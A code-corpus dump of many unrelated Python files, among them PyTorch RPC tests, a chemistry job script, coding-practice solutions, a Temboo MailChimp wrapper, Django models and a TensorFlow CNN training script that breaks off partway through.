rpc.rpc_sync(dst, torch.add, args=(torch.zeros(2).to(0), 1))
elif mode == RPCExecMode.REMOTE:
rpc.remote(dst, torch.add, args=(torch.zeros(2).to(0), 1)).to_here()
else:
raise ValueError(f"unexpected mode {mode}")
# make sure RPC is still functioning
ret = rpc.rpc_sync(dst, torch.add, args=(torch.ones(2), 1))
self.assertEqual(ret, torch.ones(2) + 1)
def _test_device_maps_missing_config_response(self, mode):
dst = worker_name((self.rank + 1) % self.world_size)
errMsg = "Response device mapping is not available"
with self.assertRaisesRegex(RuntimeError, errMsg):
if mode == RPCExecMode.SYNC:
rpc.rpc_sync(
dst,
TensorPipeAgentRpcTest._add_to_gpu,
args=(torch.zeros(2), 1)
)
elif mode == RPCExecMode.REMOTE:
rpc.remote(
dst,
TensorPipeAgentRpcTest._add_to_gpu,
args=(torch.zeros(2), 1)
).to_here()
else:
raise ValueError(f"unexpected mode {mode}")
# make sure RPC is still functioning
ret = rpc.rpc_sync(dst, torch.add, args=(torch.ones(2), 1))
self.assertEqual(ret, torch.ones(2) + 1)
@skip_if_lt_x_gpu(1)
@dist_init
def test_device_maps_missing_config(self):
self._test_device_maps_missing_config(RPCExecMode.SYNC)
@skip_if_lt_x_gpu(1)
def test_device_maps_missing_config_not_timeout(self):
dst = worker_name((self.rank + 1) % self.world_size)
options = self.rpc_backend_options
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options
)
timeout = rpc.get_rpc_timeout()
tik = time.time()
self._test_device_maps_missing_config(RPCExecMode.SYNC)
rpc.shutdown()
tok = time.time()
self.assertTrue(tok - tik < timeout)
@skip_if_lt_x_gpu(1)
@dist_init
def test_device_maps_missing_config_loop(self):
for _ in range(self.rpc_backend_options.num_worker_threads + 5):
self._test_device_maps_missing_config(RPCExecMode.SYNC)
@skip_if_lt_x_gpu(1)
@dist_init
def test_device_maps_missing_config_response(self):
self._test_device_maps_missing_config_response(RPCExecMode.SYNC)
@skip_if_lt_x_gpu(1)
@dist_init
def test_device_maps_missing_config_response_loop(self):
for _ in range(self.rpc_backend_options.num_worker_threads + 5):
self._test_device_maps_missing_config_response(RPCExecMode.SYNC)
@skip_if_lt_x_gpu(1)
@dist_init
def test_device_maps_missing_config_remote(self):
self._test_device_maps_missing_config(RPCExecMode.REMOTE)
@skip_if_lt_x_gpu(1)
@dist_init
def test_device_maps_missing_config_remote_response(self):
self._test_device_maps_missing_config_response(RPCExecMode.REMOTE)
@skip_if_lt_x_gpu(2)
def test_device_maps_remote(self):
options = self.rpc_backend_options
dst = worker_name((self.rank + 1) % self.world_size)
options.set_device_map(dst, {1: 0})
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
rref = rpc.remote(
dst,
TensorPipeAgentRpcTest._add_to_gpu,
args=(torch.zeros(2), 1)
)
self.assertEqual(rref.to_here(), torch.ones(2).to(1))
rpc.shutdown()
# ---- file: /scripts/create_prod_optfreq_jobs.py (repo: yunsiechung/ard_gsm, license: MIT) ----
#!/usr/bin/env python
# -*- coding:utf-8 -*-
import argparse
import glob
import os
import re
from ard_gsm.qchem import QChem
from ard_gsm.util import iter_sub_dirs, read_xyz_file
def main():
args = parse_args()
num_regex = re.compile(r'\d+')
maxnum = float('inf') if args.maxnum is None else args.maxnum
for gsm_sub_dir in iter_sub_dirs(args.gsm_dir, pattern=r'gsm\d+'):
gsm_num = int(num_regex.search(os.path.basename(gsm_sub_dir)).group(0))
if gsm_num > maxnum:
continue
out_dir = os.path.join(args.out_dir, os.path.basename(gsm_sub_dir))
if not os.path.exists(out_dir):
os.makedirs(out_dir)
elif not args.overwrite:
continue
qstart_file = os.path.join(gsm_sub_dir, 'qstart')
qtmp = QChem(logfile=qstart_file)
charge, multiplicity = qtmp.get_charge(), qtmp.get_multiplicity()
print(f'Extracting from {gsm_sub_dir}...')
for gsm_log in glob.iglob(os.path.join(gsm_sub_dir, 'gsm*.out')):
num = int(num_regex.search(os.path.basename(gsm_log)).group(0))
string_file = os.path.join(gsm_sub_dir, f'stringfile.xyz{num:04}')
if not (os.path.isfile(string_file) and os.path.getsize(string_file) > 0):
continue
if args.ignore_errors and has_error(gsm_log):
continue
if args.ignore_errors or is_successful(gsm_log):
# Optimize van-der-Waals wells instead of separated products
# Also check if product optimization during GSM failed
xyzs = read_xyz_file(string_file, with_energy=True)
last_energy = xyzs[-1][-1]
second_to_last_energy = xyzs[-2][-1]
if last_energy > second_to_last_energy: # Something went wrong in product optimization
continue
path = os.path.join(out_dir, f'prod_optfreq{num:04}.in')
q = QChem(config_file=args.config)
q.make_input_from_coords(path, *xyzs[-1][:-1], charge=charge, multiplicity=multiplicity, mem=args.mem)
def is_successful(gsm_log):
"""
Success is defined as having converged to a transition state.
"""
with open(gsm_log) as f:
for line in reversed(f.readlines()):
if '-XTS-' in line or '-TS-' in line:
return True
return False
def has_error(gsm_log):
"""
Check if last node is high in energy or if the path is dissociative.
"""
with open(gsm_log) as f:
for line in reversed(f.readlines()):
if 'high energy' in line and '-exit early-' in line:
return True
if 'terminating due to dissociation' in line:
return True
return False
def parse_args():
parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument('gsm_dir', metavar='GSMDIR', help='Path to directory containing GSM folders')
parser.add_argument('out_dir', metavar='ODIR', help='Path to output directory')
parser.add_argument('--mem', type=int, metavar='MEM', help='Q-Chem memory')
parser.add_argument('--overwrite', action='store_true', help='Overwrite input files in existing directories')
parser.add_argument('--maxnum', type=int, metavar='NUM', help='Only make jobs from GSM folders up to this number')
parser.add_argument('--ignore_errors', action='store_true',
help='Extract from all GSM calculations ignoring (most) errors')
parser.add_argument(
'--config', metavar='FILE',
default=os.path.join(os.path.dirname(os.path.abspath(__file__)), os.pardir, 'config', 'qchem.opt_freq'),
help='Configuration file for product optfreq jobs in Q-Chem'
)
return parser.parse_args()
if __name__ == '__main__':
main()
# ---- file: /test_arg.py (repo: liuyug/pytest, no license) ----
#!/usr/bin/env python
# -*- encoding:utf-8 -*-
import argparse
import unittest
class testArgs(unittest.TestCase):
def setUp(self):
self.args = (
['--foo', 'abc', 'abcdefg.ext'],
['-a', 'abc', '-a', 'bcd', '-a', 'cde', 'def.def'],
['-vvvv', 'abc.ea'],
#['--version'],
)
self.parser = argparse.ArgumentParser()
self.parser.add_argument('--foo', help='foo help', default='foo')
self.parser.add_argument('-a', '--all', help='all help', action='append')
self.parser.add_argument('-v', '--verbose', help='verbose help', action='count')
#self.parser.add_argument('--version', action='version', version='%(prog)s 0.3')
self.parser.add_argument('file', help='add filename')
def testargs(self):
for args in self.args:
print('args: ', args)
pargs = self.parser.parse_args(args)
print(pargs)
if __name__ == '__main__':
unittest.main()
# ---- file: /CodeForces/yes-or-yes.py (repo: tahmid-tanzim/problem-solving, no license) ----
# https://codeforces.com/problemset/problem/1703/A
# A. YES or YES?
if __name__ == "__main__":
for _ in range(int(input())):
print('YES' if input().lower() == 'yes' else 'NO')
# ---- file: /moodledata/vpl_data/334/usersdata/294/100466/submittedfiles/listas.py (repo: rafaelperazzo/programacao-web, no license) ----
# -*- coding: utf-8 -*-
n= int(input('Digite o número de elementos: '))
while n<2:
n= int(input('Digite o número de elementos: '))
a=[]
for i in range (0,n,1):
a.append(int(input('Digite o elemento%d: ' %(i+1))))
# degrau = largest absolute difference between adjacent elements
degrau=0
for i in range (0,n-1,1):
    dif= a[i]-a[i+1]
    if dif<0:
        dif=dif*(-1)
    if dif>degrau:
        degrau=dif
print(degrau)
# ---- file: /2019_late/20190829/swea_5105_미로의거리.py (repo: dodonmountain/algorithm, no license) ----
import sys
sys.stdin = open('5105.txt')
from pprint import pprint
from collections import deque
def bfs(x, y):
global shortest
Q = deque()
    visit[x][y] = True
Q.append((x, y))
dx = [0, 0, -1, 1]
dy = [-1, 1, 0, 0]
D = [[0] * N for _ in range(N)] # 최단 거리를 저장
while Q:
xx, yy = Q.popleft()
for step in range(4):
nx = xx + dx[step]
ny = yy + dy[step]
if nx < 0 or ny < 0 or nx > N-1 or ny > N-1:
continue
if maze[nx][ny] == 3:
shortest = D[xx][yy]
return
if maze[nx][ny] == 0 and visit[nx][ny] == False:
visit[nx][ny] = 1 # 방문표시
D[nx][ny] = D[xx][yy] + 1
Q.append((nx, ny))
T = int(input())
for t_case in range(T):
shortest = 0
N = int(input())
visit = [[0] * N for _ in range(N)]
maze = []
for _ in range(N):
maze.append(list(map(int,input())))
# pprint(maze, width=30)
for i in range(N):
for j in range(N):
if maze[i][j] == 2:
start = [i, j]
elif maze[i][j] == 3:
goal = [i, j]
bfs(start[0], start[1])
pprint(visit,width=40)
print('#{} {}'.format(t_case + 1, shortest))
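
# Expected shape of 5105.txt (an assumption inferred from how the input is read
# above, not taken from the actual data file): the number of test cases T, then
# for each case the maze size N followed by N rows of digits, where 0 is an open
# cell, 1 a wall, 2 the start and 3 the goal, e.g.
#
#   1
#   5
#   11111
#   12001
#   11101
#   10301
#   11111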
| [
"[email protected]"
] | |
01d0c81a95e80f405f125fd99caa00848d8f6f63 | a86ca34e23afaf67fdf858df9e47847606b23e0c | /lib/temboo/Library/MailChimp/ListSubscribe.py | 1366bda24013c469dbaa94248b91bb53f0dbbfa1 | [] | no_license | miriammelnick/dont-get-mugged | 6026ad93c910baaecbc3f5477629b0322e116fa8 | 1613ee636c027ccc49c3f84a5f186e27de7f0f9d | refs/heads/master | 2021-01-13T02:18:39.599323 | 2012-08-12T23:25:47 | 2012-08-12T23:25:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,083 | py |
###############################################################################
#
# ListSubscribe
# Adds a subscriber to a MailChimp list.
#
# Python version 2.6
#
###############################################################################
from temboo.core.choreography import Choreography
from temboo.core.choreography import InputSet
from temboo.core.choreography import ResultSet
from temboo.core.choreography import ChoreographyExecution
class ListSubscribe(Choreography):
"""
Create a new instance of the ListSubscribe Choreography. A TembooSession object, containing a valid
set of Temboo credentials, must be supplied.
"""
def __init__(self, temboo_session):
Choreography.__init__(self, temboo_session, '/Library/MailChimp/ListSubscribe')
def new_input_set(self):
return ListSubscribeInputSet()
def _make_result_set(self, result, path):
return ListSubscribeResultSet(result, path)
def _make_execution(self, session, exec_id, path):
return ListSubscribeChoreographyExecution(session, exec_id, path)
"""
An InputSet with methods appropriate for specifying the inputs to the ListSubscribe
choreography. The InputSet object is used to specify input parameters when executing this choreo.
"""
class ListSubscribeInputSet(InputSet):
"""
Set the value of the APIKey input for this choreography. ((required, string) The API Key provided by Mailchimp.)
"""
def set_APIKey(self, value):
InputSet._set_input(self, 'APIKey', value)
"""
Set the value of the DoubleOptIn input for this choreography. ((optional, boolean) Flag to control whether a double opt-in confirmation message is sent. Specify '1' (true) or '0' (false). Defaults to 0.)
"""
def set_DoubleOptIn(self, value):
InputSet._set_input(self, 'DoubleOptIn', value)
"""
Set the value of the EmailAddress input for this choreography. ((conditional, string) The email address for the subscriber you want to create. Required unless the email address is included in the MergeVars input as part of your JSON object.)
"""
def set_EmailAddress(self, value):
InputSet._set_input(self, 'EmailAddress', value)
"""
Set the value of the EmailType input for this choreography. ((optional, string) Must be one of 'text', 'html', or 'mobile'. Defaults to html.)
"""
def set_EmailType(self, value):
InputSet._set_input(self, 'EmailType', value)
"""
Set the value of the ListId input for this choreography. ((required, string) The id of the list that the subsbriber will be added to.)
"""
def set_ListId(self, value):
InputSet._set_input(self, 'ListId', value)
"""
Set the value of the MergeVars input for this choreography. ((conditional, json) A JSON object of the merge fields for this subscriber. If the subscriber email address is not provided for the EmailAddress input, it must be specified here.)
"""
def set_MergeVars(self, value):
InputSet._set_input(self, 'MergeVars', value)
"""
Set the value of the ReplaceInterests input for this choreography. ((optional, boolean) A flag to determine whether to replace the interest groups with the groups provided or add the provided groups to the member's interest groups. Specify '1' (true) or '0' (false). Defaults to 1.)
"""
def set_ReplaceInterests(self, value):
InputSet._set_input(self, 'ReplaceInterests', value)
"""
Set the value of the SendWelcome input for this choreography. ((optional, boolean) If double_optin is false and this flag is true, a welcome email will be sent. Note that this does not apply when updating records. Specify '1' (true) or '0' (false). Defaults to 0.)
"""
def set_SendWelcome(self, value):
InputSet._set_input(self, 'SendWelcome', value)
"""
Set the value of the UpdateExisting input for this choreography. ((optional, boolean) Indicates that if the email already exists, this request will perform an update instead of an insert. Specify '1' (true) or '0' (false). Defaults to 1.)
"""
def set_UpdateExisting(self, value):
InputSet._set_input(self, 'UpdateExisting', value)
"""
A ResultSet with methods tailored to the values returned by the ListSubscribe choreography.
The ResultSet object is used to retrieve the results of a choreography execution.
"""
class ListSubscribeResultSet(ResultSet):
"""
Retrieve the value for the "Response" output from this choreography execution. (The response from Mailchimp. Returns the string "true" for success and an error description for failures.)
"""
def get_Response(self):
return self._output.get('Response', None)
class ListSubscribeChoreographyExecution(ChoreographyExecution):
def _make_result_set(self, response, path):
return ListSubscribeResultSet(response, path)
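
# Rough usage sketch (not part of the generated class). TembooSession and the
# execute_with_results() call are assumed to come from the surrounding Temboo
# SDK; the exact signatures are assumptions, not taken from this file:
#
#   session = TembooSession('ACCOUNT_NAME', 'APP_KEY_NAME', 'APP_KEY_VALUE')
#   choreo = ListSubscribe(session)
#   inputs = choreo.new_input_set()
#   inputs.set_APIKey('MAILCHIMP_API_KEY')
#   inputs.set_ListId('LIST_ID')
#   inputs.set_EmailAddress('SUBSCRIBER_EMAIL')
#   results = choreo.execute_with_results(inputs)
#   print(results.get_Response())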
| [
"miriam@famulus"
] | miriam@famulus |
445c6ff875319e02bf6c664717e3b20fcc1eeef2 | 9743d5fd24822f79c156ad112229e25adb9ed6f6 | /xai/brain/wordbase/otherforms/_peters.py | 5c5535b7cf2fe2459518556a2fea0f4e76f710a9 | [
"MIT"
] | permissive | cash2one/xai | de7adad1758f50dd6786bf0111e71a903f039b64 | e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6 | refs/heads/master | 2021-01-19T12:33:54.964379 | 2017-01-28T02:00:50 | 2017-01-28T02:00:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 218 | py |
#calss header
class _PETERS():
def __init__(self,):
self.name = "PETERS"
        self.definitions = ['peter']
self.parents = []
self.childen = []
self.properties = []
self.jsondata = {}
self.basic = ['peter']
| [
"[email protected]"
] | |
05dfdbb7f1fe32835a1c9b65abe2e372a8d9fad3 | 3eff0ac549dd24fbade02d63c3a541ab88db1e5b | /ultimate_python/pythonrefresh.py | 36dd68b468c98ac1e89ac271b58821745d51e6d4 | [] | no_license | lisaolson/udemy | 618410fb548db864b7878de5a2231e8293daa2ad | f40f947f6f79d692748f3efba02176fb360f0c4e | refs/heads/master | 2020-03-28T20:14:23.028759 | 2018-09-18T19:45:32 | 2018-09-18T19:45:32 | 149,051,967 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,845 | py | # VARIABLE
age = 21
name="Lisa"
# print("Hello my name is {} and I am {} years old".format(name, age))
if age < 25:
print('You are young')
def hello(name, age):
return 'Hello {} you are {} years old'.format(name, age)
sentence = hello('Lisa', 21)
print(sentence)
# LIST
dognames = ["Fido", "Sean", "Sally", "Mark"]
dognames.insert(0, "Jane")
print(dognames)
print(dognames[2])
print(len(dognames))
dognames[1] = "Lilo"
print(dognames)
# FOR LOOP
for dog in dognames:
print(dog)
for x in range(1,10):
print(x)
age = 0
# WHILE LOOP
while age < 18:
print(age)
age += 1
numbers = [76, 83, 16, 69, 52, 78, 10, 77, 45, 52, 32, 17, 58, 54, 79, 72, 55, 50, 81, 74, 45, 33, 38, 10, 40, 44, 70, 81, 79, 28, 83, 41, 14, 16, 27, 38, 20, 84, 24, 50, 59, 71, 1, 13, 56, 91, 29, 54, 65, 23, 60, 57, 13, 39, 58, 94, 94, 42, 46, 58, 59, 29, 69, 60, 83, 9, 83, 5, 64, 70, 55, 89, 67, 89, 70, 8, 90, 17, 48, 17, 94, 18, 98, 72, 96, 26, 13, 7, 58, 67, 38, 48, 43, 98, 65, 8, 74, 44, 92]
for number in numbers:
if number > 90:
print(number)
# LIBRARY
dogs = {"Fido":8, "Sally":17, "Sean":2}
print(dogs["Sally"])
dogs["Sarah"] = 6
print(dogs)
# CLASS
class Dog:
dogInfo = "Hey dogs are cool!"
def bark(self, str): # self as the first parameter then you can add something for the second parameter
print('BARK!' + str)
mydog = Dog()
mydog.bark("bark bark bark bark")
mydog.name = "Fido"
mydog.age = 16
print(mydog.name)
print(mydog.age)
Dog.dogInfo = "Hey there"
print(Dog.dogInfo)
class Horse:
def __init__(self, name, age, furcolor): # you can call 'self' anything as long as it's the same everywhere
self.name = name
self.age = age
self.furcolor = furcolor
def neigh(self):
print("NEIGH!")
myhorse = Horse("Joker", 7, "Brown")
print(myhorse.age)
| [
"[email protected]"
] | |
f16f18958e39635b2ec69e9ef800bff4f89db0b2 | b05761d771bb5a85d39d370c649567c1ff3eb089 | /venv/lib/python3.10/site-packages/poetry/core/_vendor/tomlkit/api.py | 23658477769d0ea33af12aa07d3fc063cfaeaef7 | [] | no_license | JawshyJ/Coding_Practice | 88c49cab955eab04609ec1003b6b8c20f103fc06 | eb6b229d41aa49b1545af2120e6bee8e982adb41 | refs/heads/master | 2023-02-19T10:18:04.818542 | 2023-02-06T21:22:58 | 2023-02-06T21:22:58 | 247,788,631 | 4 | 0 | null | null | null | null | UTF-8 | Python | false | false | 96 | py | /home/runner/.cache/pip/pool/3c/67/92/c18b0ffb5593ff972c09bb41120b8c23e3d192f2ff675748efe3028432 | [
"[email protected]"
] | |
a6bec2e6e27892e9e71ddf65399e880ac78e4293 | f00ad57c98e554470a72511dda7a7bfd160aca19 | /linear_structure/stack/infix_expression_ui.py | 5a43f72bf018cb2935ef1500165bb647398f3437 | [] | no_license | fanzhangg/algorithm-problems | d60115210aaaffcd094b34b9db5b46dadf93fe9e | 43b111ad625f197ba0905abceab9ee4484284e08 | refs/heads/master | 2021-07-12T20:24:46.265700 | 2020-07-06T17:58:31 | 2020-07-06T17:58:31 | 171,220,135 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 516 | py | from infix_expression import *
def eval_infix_input():
while True:
infix = input(">>>")
if not infix:
print("Session ended. Thanks for using!")
break
try:
postfix = infix_to_postfix(infix)
answer = eval_postfix(postfix)
if int(answer) == answer:
answer = int(answer)
print(answer)
except SyntaxError:
print("Invalid syntax!")
if __name__ == "__main__":
eval_infix_input()
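
# Illustrative sketch only: the real infix_to_postfix/eval_postfix helpers live
# in the infix_expression module (not shown here); infix_to_postfix is presumably
# a shunting-yard conversion. A minimal postfix evaluator in the same spirit:
#
#   def eval_postfix_sketch(tokens):
#       stack = []
#       for tok in tokens:
#           if tok in ('+', '-', '*', '/'):
#               b, a = stack.pop(), stack.pop()
#               stack.append({'+': a + b, '-': a - b, '*': a * b, '/': a / b}[tok])
#           else:
#               stack.append(float(tok))
#       return stack[0]
#
#   eval_postfix_sketch(['3', '4', '+', '2', '*'])   # -> 14.0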
| [
"[email protected]"
] | |
7ed072fa1524c95c0ada3f899e91a7dcbcfd91de | 9897061cfd34babf80616ff21a20c30db0212970 | /server/account/models.py | a01557b1bd74e7b11b8ff7b13401a7a631636ebe | [
"MIT"
] | permissive | Samhaina/mahjong-portal | f310553c5df13e122f3e89d05a9867d0f122d4f1 | 4cdbd8bd61655584c25a437b3d5cab053507b2f4 | refs/heads/master | 2020-03-16T22:10:20.864718 | 2018-10-11T00:45:22 | 2018-10-11T00:45:22 | 133,029,373 | 0 | 0 | null | 2018-05-11T11:05:41 | 2018-05-11T11:05:41 | null | UTF-8 | Python | false | false | 287 | py | from django.db import models
from django.contrib.auth.models import AbstractUser
from tournament.models import Tournament
class User(AbstractUser):
is_tournament_manager = models.BooleanField(default=False)
managed_tournaments = models.ManyToManyField(Tournament, blank=True)
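
# Note: a custom user model only takes effect when the project settings point at
# it; assuming this app is installed under the label "account", that means:
#
#   AUTH_USER_MODEL = 'account.User'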
| [
"[email protected]"
] | |
6631cd057d686d0a0d7c910975132247c9c16828 | 4e30c855c253cc1d972d29e83edb9d5ef662d30a | /approval/models/returns.py | fc4920552b9ab0a32ad1d864ac946c3732809dab | [
"MIT"
] | permissive | rajeshr188/django-onex | 8b531fc2f519d004d1da64f87b10ffacbd0f2719 | 0a190ca9bcf96cf44f7773686205f2c1f83f3769 | refs/heads/master | 2023-08-21T22:36:43.898564 | 2023-08-15T12:08:24 | 2023-08-15T12:08:24 | 163,012,755 | 2 | 0 | NOASSERTION | 2023-07-22T09:47:28 | 2018-12-24T17:46:35 | Python | UTF-8 | Python | false | false | 3,919 | py | from django.contrib.contenttypes.fields import GenericRelation
from django.db import models, transaction
from django.db.models import Sum
from django.urls import reverse
from approval.models import ApprovalLine
from contact.models import Customer
from dea.models import Journal, JournalTypes
from product.models import StockLot
"""
The lifecycle of an approval voucher, as it should be recorded in the database
or inventory management system:

1. When an approval voucher is created, the stock items being approved for release
   to a contact are recorded, along with the contact's information.
2. When the approved stock items are released to the contact, they are recorded as
   moved out of the approval area and into the possession of the contact.
3. If the contact returns some or all of the approved stock items, those items are
   recorded as being returned to the approval area.
4. When the approval is complete and all approved stock items have been returned,
   the approval is closed.
5. Any stock items that were approved for release but not returned are flagged for
   invoicing.
6. When the invoice is created, the stock items that were approved but not returned
   are included on the invoice, along with the appropriate billing information.
7. Any changes made to the approval, return, or invoice are recorded, along with a
   timestamp and the user who made the changes.
"""
# Create your models here.
class Return(models.Model):
created_at = models.DateTimeField(auto_now_add=True, editable=False)
updated_at = models.DateTimeField(auto_now=True, editable=False)
created_by = models.ForeignKey(
"users.CustomUser", on_delete=models.CASCADE, null=True, blank=True
)
contact = models.ForeignKey(
Customer, related_name="approval_returns", on_delete=models.CASCADE
)
total_wt = models.DecimalField(max_digits=10, decimal_places=3, default=0)
total_qty = models.IntegerField(default=0)
posted = models.BooleanField(default=False)
def __str__(self):
return f"Return #{self.id}"
def get_absolute_url(self):
return reverse("approval:approval_return_detail", args=(self.pk,))
def get_total_qty(self):
return self.returnitem_set.aggregate(t=Sum("quantity"))["t"]
def get_total_wt(self):
return self.returnitem_set.aggregate(t=Sum("weight"))["t"]
class ReturnItem(models.Model):
return_obj = models.ForeignKey(Return, on_delete=models.CASCADE)
line_item = models.ForeignKey(
ApprovalLine, on_delete=models.CASCADE, related_name="return_items"
)
quantity = models.IntegerField(default=0)
weight = models.DecimalField(max_digits=10, decimal_places=3, default=0.0)
created_at = models.DateTimeField(auto_now_add=True)
updated_at = models.DateTimeField(auto_now=True)
journal = GenericRelation(Journal, related_query_name="approval_returnitem")
def __str__(self):
return f"{self.quantity} x {self.line_item.product}"
def get_absolute_url(self):
return reverse("approval:approval_returnitem_detail", args=(self.pk,))
def get_hx_edit_url(self):
kwargs = {"return_pk": self.return_obj.id, "pk": self.pk}
return reverse("approval:approval_returnitem_update", kwargs=kwargs)
def create_journal(self):
return Journal.objects.create(
journal_type=JournalTypes.SJ,
desc="Approval Return",
content_object=self,
)
def get_journal(self):
return self.journal.first()
@transaction.atomic
def post(self, journal):
self.line_item.product.transact(self.weight, self.quantity, journal, "AR")
self.line_item.update_status()
@transaction.atomic
def unpost(self, journal):
self.line_item.product.transact(self.weight, self.quantity, journal, "A")
self.line_item.update_status()
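
# Sketch of the posting flow for one returned line item, using only the methods
# defined above (assumes `item` is an existing, not-yet-posted ReturnItem):
#
#   journal = item.create_journal()   # wrap the stock movement in a Journal
#   item.post(journal)                # book the return ("AR") and refresh the line status
#   item.unpost(journal)              # later, reverse it ("A") if the posting must be undone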
| [
"[email protected]"
] | |
b4e8b03b8387462c961ea36f580a145007ada11a | 38b68b2202726bcdea32271448fea22554db6121 | /BOJ/Silver/1992.py | 3b0a539d575b9951914cdb95f3dbd52b1b69e1cd | [] | no_license | Soohee410/Algorithm-in-Python | 42c4f02342dc922e44ee07e3a0e1d6c0a559e0bb | fbc859c092d86174387fe3dc11f16b616e6fdfab | refs/heads/master | 2023-05-06T13:07:19.179143 | 2021-05-14T14:32:44 | 2021-05-14T14:32:44 | 336,232,129 | 4 | 0 | null | null | null | null | UTF-8 | Python | false | false | 495 | py | def QuadTree(n, cp, x, y):
if n == 1:
return cp[x][y]
cp1 = QuadTree(n // 2, cp, x, y)
cp2 = QuadTree(n // 2, cp, x, y + n // 2)
cp3 = QuadTree(n // 2, cp, x + n // 2, y)
cp4 = QuadTree(n // 2, cp, x + n // 2, y + n // 2)
if cp1 == cp2 == cp3 == cp4 and len(cp1) == 1:
return cp1
return '('+cp1+cp2+cp3+cp4+')'
if __name__ == "__main__":
n = int(input())
arr = [list(input().rstrip()) for _ in range(n)]
print(QuadTree(n, arr, 0, 0))
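
# Small worked example: for the 2x2 input
#
#   2
#   10
#   11
#
# the four quadrants compress to '1', '0', '1', '1'; they are not all equal, so
# the program prints '(1011)'.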
| [
"[email protected]"
] | |
1b59986d14faeb17881c11ce0e4490deee33f0a4 | 08330ea5c2495d5dc958d4cf11b68c5650396e3e | /main.py | 96bc672b9314ca63c2ef52b701f996ef5869ae68 | [] | no_license | marco-willi/tf-estimator-cnn | d74be01143b6a724534737807ebb78db518c6b87 | df3a5651b0f8018d3b9bc4b424f8090fb74ca26f | refs/heads/master | 2020-03-22T03:00:54.073040 | 2018-07-17T08:52:16 | 2018-07-17T08:52:16 | 139,408,220 | 4 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,526 | py | """ Estimator API for CNNs using popular implementations """
import os
import random
import tensorflow as tf
import numpy as np
from estimator import model_fn
#################################
# Parameters
#################################
flags = tf.app.flags
FLAGS = flags.FLAGS
flags.DEFINE_string(
'root_path',
'',
"Images root path - must contain directories with class specific images")
flags.DEFINE_string(
'model_save_path', '',
"Path in which to save graphs, models and summaries")
flags.DEFINE_string(
'model', 'small_cnn',
"Model name")
flags.DEFINE_integer(
'max_epoch', 10,
"Max epoch to train model")
flags.DEFINE_integer(
'batch_size', 64,
"Batch size for model training")
flags.DEFINE_integer(
'image_size', 50,
"Image size (width/height) for model input")
flags.DEFINE_integer(
'num_gpus', 0,
"Number of GPUs for model training")
flags.DEFINE_integer(
'num_cpus', 2,
"Numer of CPUs (for pre-processing)")
flags.DEFINE_float('train_fraction', 0.8, "training set fraction")
flags.DEFINE_bool(
'color_augmentation', True,
"Whether to randomly adjust colors during model training")
flags.DEFINE_float(
'weight_decay', 0,
'Applies weight decay if supported by specific model')
flags.DEFINE_list(
'image_means', [0, 0, 0],
'image means (leave at default for automatic mode)')
flags.DEFINE_list(
'image_stdevs', [1, 1, 1],
'image stdevs (leave at default for automatic mode)')
# #DEBUG
# FLAGS.root_path = '/host/data_hdd/ctc/ss/images/'
# FLAGS.model_save_path = '/host/data_hdd/ctc/ss/runs/species/resnet18_test/'
# FLAGS.model = 'ResNet18'
# FLAGS.num_gpus = 1
# FLAGS.num_cpus = 4
# FLAGS.weight_decay = 0.0001
#################################
# Define Dataset
#################################
# get all class directories
classes = os.listdir(FLAGS.root_path)
n_classes = len(classes)
# find all images
image_paths = dict()
for cl in classes:
image_names = os.listdir(os.path.join(FLAGS.root_path, cl))
image_paths[cl] = [os.path.join(FLAGS.root_path, cl, x)
for x in image_names]
# Map classes to numerics
classes_to_num_map = {k: i for i, k in enumerate(classes)}
num_to_class_map = {v: k for k, v in classes_to_num_map.items()}
# Create lists of image paths and labels
label_list = list()
image_path_list = list()
for k, v in image_paths.items():
label_list += [classes_to_num_map[k] for i in range(0, len(v))]
image_path_list += v
# randomly shuffle input to ensure good mixing when model training
indices = [i for i in range(0, len(label_list))]
random.seed(123)
random.shuffle(indices)
image_path_list = [image_path_list[i] for i in indices]
label_list = [label_list[i] for i in indices]
n_records = len(label_list)
# Create training and test set
train_fraction = FLAGS.train_fraction
n_train = int(round(n_records * train_fraction, 0))
n_test = n_records - n_train
train_files = image_path_list[0: n_train]
train_labels = label_list[0: n_train]
test_files = image_path_list[n_train:]
test_labels = label_list[n_train:]
#################################
# Dataset Iterator
#################################
# Standardize a single image
def _standardize_images(image, means, stdevs):
""" Standardize images """
with tf.name_scope("image_standardization"):
means = tf.expand_dims(tf.expand_dims(means, 0), 0)
means = tf.cast(means, tf.float32)
stdevs = tf.expand_dims(tf.expand_dims(stdevs, 0), 0)
stdevs = tf.cast(stdevs, tf.float32)
image = image - means
image = tf.divide(image, stdevs)
return image
# data augmentation
def _image_augmentation(image):
""" Apply some random image augmentation """
with tf.name_scope("image_augmentation"):
image = tf.image.random_flip_left_right(image)
image = tf.image.random_brightness(image, max_delta=0.2)
image = tf.image.random_contrast(image, lower=0.9, upper=1)
image = tf.image.random_hue(image, max_delta=0.02)
image = tf.image.random_saturation(image, lower=0.8, upper=1.2)
return image
# parse a single image
def _parse_function(filename, label, augmentation=True):
image_string = tf.read_file(filename)
image = tf.image.decode_jpeg(image_string, channels=3)
# randomly crop image from plus 10% width/height
if augmentation:
image = tf.image.resize_images(
image, [int(FLAGS.image_size*1.1), int(FLAGS.image_size*1.1)])
image = tf.random_crop(image, [FLAGS.image_size, FLAGS.image_size, 3])
else:
image = tf.image.resize_images(
image, [FLAGS.image_size, FLAGS.image_size])
image = tf.divide(image, 255.0)
if augmentation:
image = _image_augmentation(image)
image = _standardize_images(image, FLAGS.image_means,
FLAGS.image_stdevs)
return {'images': image, 'labels': label}
def dataset_iterator(filenames, labels, is_train, augmentation=True):
dataset = tf.data.Dataset.from_tensor_slices((filenames, labels))
if is_train:
dataset = dataset.shuffle(buffer_size=300)
dataset = dataset.apply(
tf.contrib.data.map_and_batch(
lambda x, y: _parse_function(x, y, augmentation),
batch_size=FLAGS.batch_size,
num_parallel_batches=1,
drop_remainder=False))
if is_train:
dataset = dataset.repeat(1)
else:
